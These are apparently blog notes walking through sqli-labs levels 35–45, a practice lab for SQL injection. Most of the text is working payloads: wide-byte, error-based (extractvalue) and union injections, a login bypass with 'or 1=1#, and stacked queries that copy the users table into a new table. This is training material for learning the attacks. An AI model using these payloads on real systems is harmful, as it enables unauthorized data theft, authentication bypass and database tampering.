sqllab第35-45关通关笔记

35关知识点:
  • 宽字节注入
  • 数值型注入
  • 错误注入
    • payload:id=1+and+extractvalue(1,concat(0x7e,database(),0x7e))=0--+
  • 联合注入
    • payload:id=0+union+select+1,database(),version()--+
36关知识点:
  • 字符型注入
  • 宽字节注入
  • 错误注入
    • payload:id=1%df%27and+extractvalue(1,concat(0x7e,database(),0x7e))=0--+
  • 联合注入
    • payload:id=0%df%27union+select+1,database(),version()--+
37关知识点:
  • 宽字节注入(bp抓包实现,不要直接在输入框中输入下面payload)
  • 字符型注入
  • 联合注入
    • payload:uname=1%df'union+select+database(),version()--+
  • 错误注入
    • payload:uname=1%df'and+extractvalue(1,concat(0x7e,database(),0x7e))--+
38关知识点:
  • 字符型注入+单引号闭合
  • 错误注入
    • payload:id=1%27and+extractvalue(1,concat(0x7e,database(),0x7e))=%271
  • 联合注入
    • payload:id=0%27union+select+1,database(),version()--+
39关知识点:
  • 数值型注入
  • 错误注入
    • payload:id=1+and%20extractvalue(1,concat(0x7e,database(),0x7e))=0
  • 联合注入
    • payload:id=0+union+select+1,version(),database()
40关知识点:
  • 字符型注入
    • 测试发现原始语句是 where id=('输入')
  • 联合注入
    • payload:id=0%27)union+select+1,database(),3%20and+1=(%271
  • 没有回显信息,不能进行错误注入
41关知识点:
  • 数值型注入
  • 联合注入
    • payload:id=0%20union+select+1,database(),version()
  • 没有回显信息,不能进行错误注入
  • 堆叠注入
    • payload:id=1;create%20table%20ren(id%20int);--+
42关知识点:
  • 密码位置可以单引号绕过
    • payload:passwd='or+1=1#
  • 堆叠注入
    • payload:passwd=';create table ren like users;# (创建一个新表ren,格式和users一样)
    • payload:passwd=';insert into ren select * from users;# (将users的内容插入到ren表中)
43关知识点:
  • 密码处读取输入为 where passwd=('输入')
    • payload:passwd=1')or 1=1#
  • 堆叠注入
    • payload:passwd=');create table ren like users;# (创建一个新表ren,格式和users一样)
    • payload:passwd=');insert into ren select * from users;# (将users的内容插入到ren表中)
44关知识点:
  • 和42关的payload一模一样
  • 直接过了
45关知识点:
  • 和43关一样的payload
  • 直接过了

10

相关推荐
编程小白gogogo7 分钟前
Spring学习笔记
笔记·学习·spring
qq_5278878714 分钟前
【学习笔记】Python中主函数调用的方式
笔记·学习
二闹1 小时前
第十六章:监理基础知识(16.1监理的意义和作用--16.5监理要素)
笔记·产品经理
致***锌2 小时前
etf期权和个股期权哪个期权费更贵?
笔记
懒惰的bit10 天前
STM32F103C8T6 学习笔记摘要(四)
笔记·stm32·学习
zkyqss10 天前
OVS Faucet练习(下)
linux·笔记·openstack
浦东新村轱天乐10 天前
【麻省理工】《how to speaking》笔记
笔记
奔跑的蜗牛AZ10 天前
TiDB 字符串行转列与 JSON 数据查询优化知识笔记
笔记·json·tidb
cwtlw10 天前
Excel学习03
笔记·学习·其他·excel
杭州杭州杭州10 天前
计算机网络笔记
笔记·计算机网络